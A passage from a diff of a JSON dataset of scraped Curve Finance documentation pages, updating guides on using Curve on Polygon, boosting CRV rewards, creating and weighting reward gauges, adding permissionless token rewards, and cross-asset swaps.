Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Using curve on polygon Table of contents Using Curve on Polygon Changing your MetaMask network Acquiring Matic to pay for transaction fees Head to Curve Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Using Curve on Polygon Changing your MetaMask network Acquiring Matic to pay for transaction fees Head to Curve Using curve on polygon Using Curve on Polygon Changing your MetaMask network Upon visiting https://polygon.curve.fi/ , you will be prompted to change your network on Metamask: Acquiring Matic to pay for transaction fees Transaction fees on Matic are very cheap usually costing less than $0.0001 but you'll still need Matic to pay for gas. You can bridge some from Ethereum using the link below: Polygon Head to Curve Once that's done you can also bridge USDC/DAI and deposit and swap on Curve Polygon website making sure you're connected to the Polygon network in your MetaMask settings: Curve.fi If you haven't used Curve below you can check out the tutorial below: Depositing Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Using Curve on Polygon Changing your MetaMask network Acquiring Matic to pay for transaction fees Head to Curve Using curve on polygon Using Curve on Polygon Changing your MetaMask network Upon visiting https://polygon.curve.fi/ , you will be prompted to change your network on Metamask: Acquiring Matic to pay for transaction fees Transaction fees on Matic are very cheap usually costing less than $0.0001 but you'll still need Matic to pay for gas. You can bridge some from Ethereum using the link below: Polygon Head to Curve Once that's done you can also bridge USDC/DAI and deposit and swap on Curve Polygon website making sure you're connected to the Polygon network in your MetaMask settings: Curve.fi If you haven't used Curve below you can check out the tutorial below: Depositing 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Boosting your crv rewards", + "title": "Boosting your CRV rewards", "html_url": "https://resources.curve.fi/reward-gauges/boosting-your-crv-rewards/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Boosting your crv rewards Table of contents Boosting your CRV Rewards Figuring out your required boost Locking your CRV Applying your boost Formula FAQ Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Boosting your CRV Rewards Figuring out your required boost Locking your CRV Applying your boost Formula FAQ Boosting your crv rewards Boosting your CRV Rewards This guide is assuming you have already provided liquidity and that you are currently staking your LP tokens on the DAO gauge. One of the main incentive for CRV is the ability to boost your rewards on provided liquidity. Vote locking CRV allows you to acquire voting power to participate in the DAO and earn a boost of up to 2.5x on the liquidity you are providing on Curve. Click below if you have questions about how the vote locking boost works: Vote Locking Boosting your rewards video guide: https://www.youtube.com/watch?v=blZTCWu-DQg Figuring out your required boost The first step to getting your rewards boosted is to figure out how much CRV you'll need to lock. All gauges have different requirements meaning some pools are easier to boost than others. It depends on how much others have locked and how much the liquidity gauge has. You can find the calculator at this address: https://dao.curve.fi/minter/calc Locking your CRV Once you know how much and how long you wish to lock for, visit the following page: https://dao.curve.fi/locker Enter the amount you want to lock and select your expiry. Remember locking is not reversible. The amount of veCRV received will depend on how much and how long you vote for. You can extend a lock and add CRV to it at any point but you cannot have CRV with different expiry dates. After creating your lock, you will need to apply your boost. Applying your boost Head over to the minter page: https://dao.curve.fi/minter/gauges If you see your new boost after Current boost: then you do not need to do anything else. If your current boost hasn't moved, you will need to claim CRV from each of the gauge you're providing liquidity in to update your boost. After doing so, your boost should be showing. Your boost will not be updated until you withdraw, deposit or claim from a liquidity gauge. Formula The boost mechanism will calculate your earning weight by taking the smaller amount of two values. The first value is simple, it's the amount of liquidity you are providing which in this example is $10,000. This amount is your maximum earning weight. FAQ Vote Locking Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Boosting your CRV rewards Table of contents Figuring out your required boost Locking your CRV Applying your boost Boost Info Formula FAQ Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Figuring out your required boost Locking your CRV Applying your boost Boost Info Formula FAQ Home Reward Gauges Boosting your CRV rewards This guide is assuming you have already provided liquidity and that you are currently staking your LP tokens on the DAO gauge. One of the main incentive for CRV is the ability to boost your rewards on provided liquidity. Vote locking CRV allows you to acquire voting power to participate in the DAO and earn a boost of up to 2.5x on the liquidity you are providing on Curve. Click below if you have questions about how the vote locking boost works: Vote Locking Boosting your rewards video guide: https://www.youtube.com/watch?v=blZTCWu-DQg Figuring out your required boost The first step to getting your rewards boosted is to figure out how much CRV you'll need to lock. All gauges have different requirements meaning some pools are easier to boost than others. It depends on how much others have locked and how much the liquidity gauge has. You can find the calculator at this address: https://dao.curve.fi/minter/calc Locking your CRV Once you know how much and how long you wish to lock for, visit the following page: https://dao.curve.fi/locker Enter the amount you want to lock and select your expiry. Remember locking is not reversible. The amount of veCRV received will depend on how much and how long you vote for. You can extend a lock and add CRV to it at any point but you cannot have CRV with different expiry dates. After creating your lock, you will need to apply your boost. Applying your boost Head over to the minter page: https://dao.curve.fi/minter/gauges If you see your new boost after Current boost: then you do not need to do anything else. If your current boost hasn't moved, you will need to claim CRV from each of the gauge you're providing liquidity in to update your boost. After doing so, your boost should be showing. Your boost will not be updated until you withdraw, deposit or claim from a liquidity gauge. Boost Info The list of pools and boost/reward info has moved away from the minter page. You can now find all this information on each pool page, on the classic.curve.fi site. Alternatively, this information can also be found in the new UI ( curve.fi ) under the \"Your Details\" section on the pool page. Be aware: The new UI does not display future boost yet. Head to the old or new dashboard to see all your pools! Formula The boost mechanism will calculate your earning weight by taking the smaller amount of two values. The first value is simple, it's the amount of liquidity you are providing which in this example is $10,000. This amount is your maximum earning weight. FAQ Vote Locking 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -2146,7 +2170,7 @@ { "title": "Creating a pool gauge", "html_url": "https://resources.curve.fi/reward-gauges/creating-a-pool-gauge/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Creating a pool gauge Table of contents Creating a Pool Gauge Deploy a Gauge Submit a DAO Vote Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Creating a Pool Gauge Deploy a Gauge Submit a DAO Vote Creating a pool gauge Creating a Pool Gauge Deploy a Gauge You can deploy the gauge directly through the UI simply by posting the address: https://classic.curve.fi/factory/create_gauge Submit a DAO Vote Once you've created your gauge, you need to submit it to the DAO for a vote. https://classic.curve.fi/factory/create_vote The address that submits must have 2500 veCRV in order to create a vote. Once the gauge has been submitted, politics take over. You may want to visit the governance forum and explain why your pool should be made eligible for rewards. Governance Forum Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Creating a pool gauge Table of contents Deploy a Gauge Deploy a Gauge via Etherscan Submit a DAO Vote Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Deploy a Gauge Deploy a Gauge via Etherscan Submit a DAO Vote Home Reward Gauges Creating a pool gauge Deploy a Gauge You can deploy the gauge directly through the UI simply by posting the address: https://classic.curve.fi/factory/create_gauge Deploy a Gauge via Etherscan In addition to the UI, there is an option to deploy the gauge directly through Etherscan. Warning Calling deploy_gauge on Etherscan will only work if the function is called on the Factory contract that also deployed the pool. To navigate to this page, first search for the corresponding Factory contract on Etherscan. Then, go to Contract -> Write Contract -> deploy_gauge . Then insert the pool address you want to add a gauge for, press on Write and sign the transaction. Before deploying the gauge, ensure you connect your wallet by clicking the Connect to Web3 button. Submit a DAO Vote Once you've created your gauge, you need to submit it to the DAO for a vote. https://classic.curve.fi/factory/create_vote The address that submits must have 2500 veCRV in order to create a vote. Once the gauge has been submitted, politics take over. You may want to visit the governance forum and explain why your pool should be made eligible for rewards. Governance Forum 2023-10-01 Back to top", "labels": [ "Documentation" ] @@ -2154,7 +2178,15 @@ { "title": "Gauge weights", "html_url": "https://resources.curve.fi/reward-gauges/gauge-weights/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Gauge weights Table of contents Gauge Weights What are gauge weights? Why are gauge weights so important? Who can vote for gauge weights? How can I vote? How often can I move my voting weight? Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Gauge Weights What are gauge weights? Why are gauge weights so important? Who can vote for gauge weights? How can I vote? How often can I move my voting weight? Gauge weights Gauge Weights What are gauge weights? Simply put, a gauge weight translates into how much of the daily CRV inflation it receives. For example on the below chart, the Y pool is currently receiving around 72% of the daily CRV inflation. This means that all liquidity providers in the Y pool share 72% of the daily CRV. You can find each liquidity gauge relative weight on this page: https://dao.curve.fi/minter/gauges Why are gauge weights so important? Because those weights decide where the CRV inflation goes, it allows the DAO to control where most of the liquidity should go and balance liquidity. It's a powerful tool for voters that must be used responsibly. The gauge weight is updated once a week on Thursdays. Who can vote for gauge weights? Anybody who has vote locked CRV can vote to direct its voting power towards one or multiple Curve pools. How can I vote? Visit this link: https://dao.curve.fi/gaugeweight Select the gauge you would like to put your voting weight towards, enter an amount in BPS (10,000 = 100% the maximum) and confirm your transaction. How often can I move my voting weight? You can change your voting weight once every 10 days. Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Gauge weights Table of contents What are gauge weights? Why are gauge weights so important? Who can vote for gauge weights? How can I vote? How often can I move my voting weight? What happens when I add additional CRV to my existing lock or extend the locktime? Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents What are gauge weights? Why are gauge weights so important? Who can vote for gauge weights? How can I vote? How often can I move my voting weight? What happens when I add additional CRV to my existing lock or extend the locktime? Home Reward Gauges Gauge weights What are gauge weights? Simply put, a gauge weight translates into how much of the daily CRV inflation it receives. For example on the below chart, the Y pool is currently receiving around 72% of the daily CRV inflation. This means that all liquidity providers in the Y pool share 72% of the daily CRV. You can find each liquidity gauge relative weight on this page: https://dao.curve.fi/minter/gauges Why are gauge weights so important? Because those weights decide where the CRV inflation goes, it allows the DAO to control where most of the liquidity should go and balance liquidity. It's a powerful tool for voters that must be used responsibly. The gauge weight is updated once a week on Thursdays. Who can vote for gauge weights? Anybody who has vote locked CRV can vote to direct its voting power towards one or multiple Curve pools. How can I vote? Visit this link: https://dao.curve.fi/gaugeweight Select the gauge you would like to put your voting weight towards, enter an amount in BPS (10,000 = 100% the maximum) and confirm your transaction. How often can I move my voting weight? You can change your voting weight once every 10 days. What happens when I add additional CRV to my existing lock or extend the locktime? Adding more $CRV to your lock or extending the locktime increases your veCRV balance. This increase is not automatically accounted for in your current gauge weight votes. If you want to allocate all of your newly acquired voting power, make sure to re-vote. Warning Resetting your gauge weight before re-voting means you'll need to wait 10 days to vote for the gauges whose weight you've reset. So, please ensure you simply re-vote; there is no need to reset your gauge weight votes before voting again. 2023-10-09 Back to top", + "labels": [ + "Documentation" + ] + }, + { + "title": " ", + "html_url": "https://resources.curve.fi/reward-gauges/permissionless-rewards/", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Permissionless rewards Table of contents Guide to Set Any Token Reward on a Gauge Setting the Reward Token and Distributor Address Call add_reward() on Etherscan Approving the Reward Token for Deposit Call approve() on Etherscan on the reward token contract Depositing the Reward Token Call deposit_reward_token() on Etherscan on the gauge Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Guide to Set Any Token Reward on a Gauge Setting the Reward Token and Distributor Address Call add_reward() on Etherscan Approving the Reward Token for Deposit Call approve() on Etherscan on the reward token contract Depositing the Reward Token Call deposit_reward_token() on Etherscan on the gauge Home Reward Gauges Guide to Set Any Token Reward on a Gauge This guide explains the process of setting any token reward using Etherscan. It's assumed that you possess some familiarity with Etherscan or are competent in executing this transaction through an alternative tool. Note that Curve has employed various gauge versions over time. If your attempts are unsuccessful, it might be due to version differences. Should you encounter repeated failures, please seek our assistance. Setting the Reward Token and Distributor Address Specify the reward token and the distributor address . The distributor address is the source from which the reward token will be sent to the gauge. Info Ensure you have the required admin/manager privileges for the gauge. The address that deployed the gauge is set as the admin/manager . If you are not admin/manager, this call will fail. To identify the manager, check the manager/admin in the \"Read Contract\" section on Etherscan. Some versions of this contract may also allow the factory owner to execute this call. The deployer of the gauge is usually the manager of the gauge if the gauge was deployed via the Proxy of the Factory. If the gauge was deployed directly through the Factory contract itself, a quick migration needs to occur (see here ). Call add_reward() on Etherscan This function should be called only once for a specific reward token. A repeated call to add_reward using a previously set reward token will fail. However, the distributor address for an already added reward token can be updated using the set_reward_distributor function. Over the lifetime of a gauge, a total of 8 different reward tokens can be set. As add_reward() is an admin guarded function, you might need to call it from a ProxyContract. More information here . Info On sidechains, permissionless rewards are directly built into the gauges. Whoever deploys the gauge can call add_rewards on the gauge contract itself (no need to migrate or do it via proxy). add_reward(_reward_token: address, _distributor: address): Function to add a reward token and distributor on Etherscan. Parameter Type Description _reward_token address Reward Token Address _distributor address Distributor Address, who can add the Reward Token Approving the Reward Token for Deposit Visit the reward token contract address on Etherscan and switch to the \"Write Contract\" tab. Use the approve() function, setting the spender as the gauge contract address and specifying the desired amount. Call approve() on Etherscan on the reward token contract approve(_spender : address, _value : uint256) -> bool: Function to approve _spender to transfer _value tokens. Parameter Type Description _spender address Gauge Contract Address _value uint256 Amount to approve Depositing the Reward Token Deposit the reward token to the contract. This action initiates the first reward epoch, lasting a week (defined as 604,800 seconds or 7 * 24 * 3600). If no additional reward token is deposited using the same function, this reward epoch ends after the week. Should you add new tokens during an ongoing epoch, both the new tokens and any remaining ones are combined, triggering a fresh week-long epoch. For consistent reward distributions, it's advisable to deposit near the end of an epoch. If replenishing mid-epoch, ensure you compute the appropriate amount for a steady distribution rate. For tokens with 18 decimals: 1 full token = 1 * 10^18 = 1000000000000000000. This function must be called using the distributor address. A previous distributor address or an admin can update the distributor address using set_reward_distributor() if necessary. Call deposit_reward_token() on Etherscan on the gauge deposit_reward_token(_reward_token: address, _amount: uint256): Function to deposit _amount of _reward_token into the gauge. Parameter Type Description _reward_token address Reward Token Address _amount uint256 Amount to be distributed over the week 2023-10-28 Back to top", "labels": [ "Documentation" ] @@ -2162,15 +2194,15 @@ { "title": "Understanding gauges", "html_url": "https://resources.curve.fi/reward-gauges/understanding-gauges/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Understanding gauges Table of contents Understanding Gauges The gauge system The weight system The DAO Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Understanding Gauges The gauge system The weight system The DAO Understanding gauges Understanding Gauges Reviewing the gauge system, one of the Curve DAO base feature. The gauge system On Curve Finance, the inflation is going to users who provide liquidity. This usage is measured with gauges. The liquidity gauge measures how much a user is providing in liquidity. The liquidity gauge measures how many dollars you have provided in a Curve pool. Each Curve pool has its own liquidity gauge where you can stake your liquidity provider tokens The weight system Each gauge also has a weight and a type. Those weights represent how much of the daily CRV inflation will be received by the liquidity gauge. The DAO The weight systems allow the Curve DAO to dictate where the CRV inflation should go. You can vote at this address: https://dao.curve.fi/gaugeweight By doing so, you can put your voting power towards the liquidity gauge (or pool) you think should receive the most CRV. Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Understanding gauges Table of contents The gauge system The weight system The DAO Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents The gauge system The weight system The DAO Home Reward Gauges Understanding gauges Reviewing the gauge system, one of the Curve DAO base feature. The gauge system On Curve Finance, the inflation is going to users who provide liquidity. This usage is measured with gauges. The liquidity gauge measures how much a user is providing in liquidity. The liquidity gauge measures how many dollars you have provided in a Curve pool. Each Curve pool has its own liquidity gauge where you can stake your liquidity provider tokens The weight system Each gauge also has a weight and a type. Those weights represent how much of the daily CRV inflation will be received by the liquidity gauge. The DAO The weight systems allow the Curve DAO to dictate where the CRV inflation should go. You can vote at this address: https://dao.curve.fi/gaugeweight By doing so, you can put your voting power towards the liquidity gauge (or pool) you think should receive the most CRV. 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Cross asset swaps", + "title": "Cross-Asset swaps", "html_url": "https://resources.curve.fi/troubleshooting/cross-asset-swaps/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Cross asset swaps Table of contents Cross-Asset Swaps Settlement and completing your trade Technical Docs Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Cross-Asset Swaps Settlement and completing your trade Technical Docs Cross asset swaps Cross-Asset Swaps Cross-asset swaps are a new type of swaps on Curve using Synthetix as a bridge. There are a few things to know about them before getting started: They have very little slippage, they can handle seven and eight-figure trades with no slippage They take six minutes due to the Synthetix settlement period and prices can move during that period You can trade any asset as it shares a pool with a synth (sUSD/sETH/sBTC) They are in beta They are expensive (~$80 at 50 gwei) and therefore best suited for large trades They have two parts and thus two transactions Initiating the trade After selecting the two assets you would like to trade, click sell and confirm the first part of your transaction. For the route below, we will go from DAI to sUSD to sBTC to renBTC. The first part of the trade takes you to sBTC. Upon confirmation you will receive an NFT which represents your trade. The trade will immediately enter a settlement period of six minutes. It is best not to close your browser during that period. Settlement and completing your trade After Synthetix settlement period, you will then be able to complete your trade by clicking the Complete trade button. This second part will then take you from sBTC to renBTC. After confirming this transaction, you then receive your renBTC. Technical Docs Read technical docs here: https://curve.readthedocs.io/cross-asset-swaps.html Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Cross-Asset swaps Table of contents Settlement and completing your trade Technical Docs Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Settlement and completing your trade Technical Docs Home Troubleshooting Cross-Asset swaps Cross-asset swaps are a new type of swaps on Curve using Synthetix as a bridge. There are a few things to know about them before getting started: They have very little slippage, they can handle seven and eight-figure trades with no slippage They take six minutes due to the Synthetix settlement period and prices can move during that period You can trade any asset as 